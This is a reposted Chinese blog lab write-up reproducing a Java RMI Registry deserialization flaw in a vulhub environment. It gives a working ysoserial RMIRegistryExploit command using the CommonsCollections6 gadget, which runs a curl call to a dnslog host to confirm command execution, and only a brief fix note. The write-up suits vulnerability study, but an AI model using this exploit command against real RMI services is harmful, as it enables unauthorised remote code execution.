Java RMI Registry 反序列化漏洞

其他 2021-02-01 10:54:15 阅读次数: 0

漏洞概述

Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind)，在bind过程中，伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象)，使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).

影响版本

<=jdk8u111

环境搭建

这里使用vulhub来搭建环境

进入目录

cd vulhub-master/java/rmi-registry-bind-deserialization

编译及启动RMI Registry和服务器

docker-compose build

docker-compose up -d

环境启动后，RMI Registry监听在1099端口。

漏洞复现

这里我们通过ysoserial来测试

https://github.com/frohoff/ysoserial.git

拉取并搭建

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial/

mvn clean package -DskipTests

通过ysoserial的exploit包中的RMIRegistryExploit进行攻击

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.204.138 1099 CommonsCollections6 "curl obeewy.dnslog.cn"

命令成功执行

修复建议

升级到安全版本

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/113444045

Java RMI Registry 反序列化漏洞

JAVA RMI 反序列化远程命令执行漏洞

Java RMI & 反序列化详细介绍

RMI反序列化

Java RMI反序列化/JEP290相关

java反序列化漏洞对策

Java反序列化漏洞分析

JAVA反序列化漏洞

Java反序列化漏洞整理

Java反序列化漏洞学习

初识Java反序列化漏洞

java反序列化漏洞-基础

Java 反序列化漏洞

Java反序列化漏洞修复

Java反射---序列化和RMI中的应用

Jmeter RMI 反序列化命令执行漏洞（CVE-2018-1297）

java反序列化——XMLDecoder反序列化漏洞

反序列化渗透与攻防(二)之Java反序列化漏洞

Java反序列化漏洞（ysoserial工具使用、shiro反序列化利用）

Java反序列化漏洞之殇

(转)Java反序列化漏洞之殇

Java反序列化漏洞从入门到深入（转载）

Java反序列化漏洞(序篇)

Java Apereo CAS 反序列化漏洞复现

Java Shiro反序列化漏洞复现

Shiro的Java原生反序列化漏洞

Java反序列化漏洞学习---Apache Commons Collections

深入剖析 Java 反序列化漏洞

Java反序列化漏洞及实例详解

【java安全】FastJson反序列化漏洞浅析

今日推荐

周排行

Android图片与下拉框

java常用的设计模式之单例模式

zabbix自动化监控之自动注册

杨老师课堂之Excel VBA 程序开发第八讲使用工作表函数

Android 去掉底部虚拟导航栏

Android Studio 3.2 Beta 4 发布，功能改进和修复

Linux-3.5_总线驱动设备

Qt QTableView QStandardItemModel用法

session处理

分享几个实用的方法

每日归档

更多

2025-02-06(0)

2025-02-05(0)

2025-02-04(0)

2025-02-03(0)

2025-02-02(0)

2025-02-01(0)

2025-01-31(0)

2025-01-30(0)

2025-01-29(0)

2025-01-28(0)